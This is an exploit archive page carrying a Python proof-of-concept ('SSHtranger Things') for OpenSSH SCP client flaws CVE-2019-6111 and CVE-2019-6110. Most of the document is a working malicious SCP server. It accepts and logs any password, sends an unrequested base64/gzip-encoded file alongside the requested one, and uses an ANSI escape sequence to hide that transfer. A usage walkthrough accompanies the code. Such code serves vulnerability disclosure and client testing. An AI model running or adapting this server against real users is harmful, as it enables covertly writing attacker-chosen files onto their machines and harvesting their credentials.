what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SSHtranger Things SCP Client File Issue

SSHtranger Things SCP Client File Issue
Posted Jan 18, 2019
Authored by Mark E. Haase

SCP clients have an issue where additional files can be copied over without your knowledge.

tags | exploit
advisories | CVE-2019-6110, CVE-2019-6111
SHA-256 | 2e1bec721a2818585cbf5ac96d1462844829f979b0d82bb420fdda7eae192719

SSHtranger Things SCP Client File Issue

Change Mirror Download
# Exploit Title: SSHtranger Things
# Date: 2019-01-17
# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>
# Vendor Homepage: https://www.openssh.com/
# Software Link: [download link if available]
# Version: OpenSSH 7.6p1
# Tested on: Ubuntu 18.04.1 LTS
# CVE : CVE-2019-6111, CVE-2019-6110

'''
Title: SSHtranger Things
Author: Mark E. Haase <mhaase@hyperiongray.com>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1

We have nicknamed this "SSHtranger Things" because the bug is so old it could be
exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`
package.

The server listens on port 2222. It accepts any username and password, and it
generates a new host key every time you run it.

$ python3 sshtranger_things.py

Download a file using a vulnerable client. The local path must be a dot:

$ scp -P 2222 foo@localhost:test.txt .
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
foo@localhost's password:
test.txt 100% 32 0.7KB/s 00:00

The file you requested (e.g. test.txt) will be saved in your current directory.
If your client is vulnerable, you will have an additional file "exploit.txt"
created in your current directory.

$ cat test.txt
This is the file you requested.
$ cat exploit.txt
SSHtranger Things

The interesting code is in ScpServer.send_file().
'''
import base64
import gzip
import logging
import paramiko
import paramiko.rsakey
import socket
import threading

logging.basicConfig(level=logging.INFO)

dummy = 'This is the file you requested.\n'
payload = gzip.decompress(base64.b64decode(
b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'
b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'
b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'
b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'
b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'
b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'
b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'
b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'
b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'
))

class ScpServer(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()

def check_auth_password(self, username, password):
logging.info('Authenticated with %s:%s', username, password)
return paramiko.AUTH_SUCCESSFUL

def check_channel_request(self, kind, chanid):
logging.info('Opened session channel %d', chanid)
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

def check_channel_exec_request(self, channel, command):
command = command.decode('ascii')
logging.info('Approving exec request: %s', command)
parts = command.split(' ')
# Make sure that this is a request to get a file:
assert parts[0] == 'scp'
assert '-f' in parts
file = parts[-1]
# Send file from a new thread.
threading.Thread(target=self.send_file, args=(channel, file)).start()
return True

def send_file(self, channel, file):
'''
The meat of the exploit:
1. Send the requested file.
2. Send another file (exploit.txt) that was not requested.
3. Print ANSI escape sequences to stderr to hide the transfer of
exploit.txt.
'''
def wait_ok():
assert channel.recv(1024) == b'\x00'
def send_ok():
channel.sendall(b'\x00')

wait_ok()

logging.info('Sending requested file "%s" to channel %d', file,
channel.get_id())
command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(dummy)
send_ok()
wait_ok()

# This is CVE-2019-6111: whatever file the client requested, we send
# them 'exploit.txt' instead.
logging.info('Sending malicious file "exploit.txt" to channel %d',
channel.get_id())
command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(payload)
send_ok()
wait_ok()

# This is CVE-2019-6110: the client will display the text that we send
# to stderr, even if it contains ANSI escape sequences. We can send
# ANSI codes that clear the current line to hide the fact that a second
# file was transmitted..
logging.info('Covering our tracks by sending ANSI escape sequence')
channel.sendall_stderr("\x1b[1A".encode('ascii'))
channel.close()

def main():
logging.info('Creating a temporary RSA host key...')
host_key = paramiko.rsakey.RSAKey.generate(1024)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 2222))
sock.listen(0)
logging.info('Listening on port 2222...')

while True:
client, addr = sock.accept()
logging.info('Received connection from %s:%s', *addr)
transport = paramiko.Transport(client)
transport.add_server_key(host_key)
server = ScpServer()
transport.start_server(server=server)

if __name__ == '__main__':
main()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close